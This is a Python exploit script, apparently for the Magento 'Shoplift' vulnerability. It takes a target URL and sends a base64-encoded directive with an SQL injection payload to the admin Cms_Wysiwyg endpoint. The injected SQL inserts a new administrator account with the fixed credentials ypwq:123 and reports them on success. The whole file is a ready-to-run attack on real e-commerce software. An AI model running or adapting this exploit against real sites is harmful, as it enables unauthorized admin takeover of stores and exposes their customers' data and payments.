1import requests
 2import base64
 3import sys
 4
 5target = sys.argv[1]
 6
 7if not target.startswith("http"):
 8    target = "http://" + target
 9
10if target.endswith("/"):
11    target = target[:-1]
12
13target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
14
15# For demo purposes, I use the same attack as is being used in the wild
16SQLQUERY="""
17SET @SALT = 'rp';
18SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
19SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
20INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
21INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
22"""
23
24# Put the nice readable queries into one line,
25# and insert the username:password combinination
26query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
27pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query).encode()
28
29# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
30r = requests.post(target_url, 
31                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
32                        "filter": base64.b64encode(pfilter),
33                        "forwarded": 1})
34if r.ok:
35    print("WORKED")
36    print("Check {0}/admin with creds ypwq:123".format(target))
37else:
38    print("DID NOT WORK")